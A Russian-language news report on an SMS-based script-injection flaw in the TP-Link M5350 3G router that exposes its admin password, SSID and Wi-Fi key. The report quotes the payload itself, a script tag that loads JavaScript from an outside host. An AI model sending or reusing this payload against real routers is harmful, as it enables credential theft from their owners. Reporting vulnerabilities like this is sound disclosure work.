Уязвимость в маршрутизаторе TP-Link позволяет получить пароль по SMS
Специалист из Германии Ян Херш (Jan Hörsch) сообщил об уязвимости в маршрутизаторах производства китайской компании TP-Link, которая позволяет получить пароль к устройству путем отправки SMS-сообщения со специальным скриптом на SIM-карту маршрутизатора.
Проблема затрагивает беспроводной мобильный 3G-маршрутизатор TP-Link M5350. Как пояснил исследователь в беседе с журналистом BleepingComputer, операторы связи часто предлагают данную модель своим клиентам наряду с SIM-картой, вставляемой в маршрутизатор. Эта SIM-карта позволяет маршрутизатору подключаться к сети оператора и так же, как любая другая «симка» имеет свой номер.
В ходе анализа прошивки машрутизатора Херш выявил уязвимость в функции обработки входящих SMS-сообщений. Он выяснил, что путем отправки сообщения со скриптом < script src=//n.ms/a.js >< /script > может получить пароль к учетной записи администратора, идентификатор беспроводной сети (SSID) и пароль от сети Wi-Fi.
По словам специалиста, угроза не так опасна, как кажется на первый взгляд, поскольку для эксплуатации уязвимости злоумышленнику нужно знать номер SIM-карты маршрутизатора.
Читайте также
- Ошибка в API Facebook предоставляла доступ к фото 6,8 млн пользователей
- Одного ноутбука оказалось достаточно для компрометации всей корпоративной сети
- Депутаты Госдумы разработали план по обеспечению работы Рунета на случай отключения от Сети
- Морские суда часто подвергаются кибератакам
- 25 декабря состоится встреча сообщества специалистов по кибербезопасности АСУ ТП / RUSCADASEC
- Уязвимость в приложении Logitech позволяла удаленно инициировать нажатие клавиш
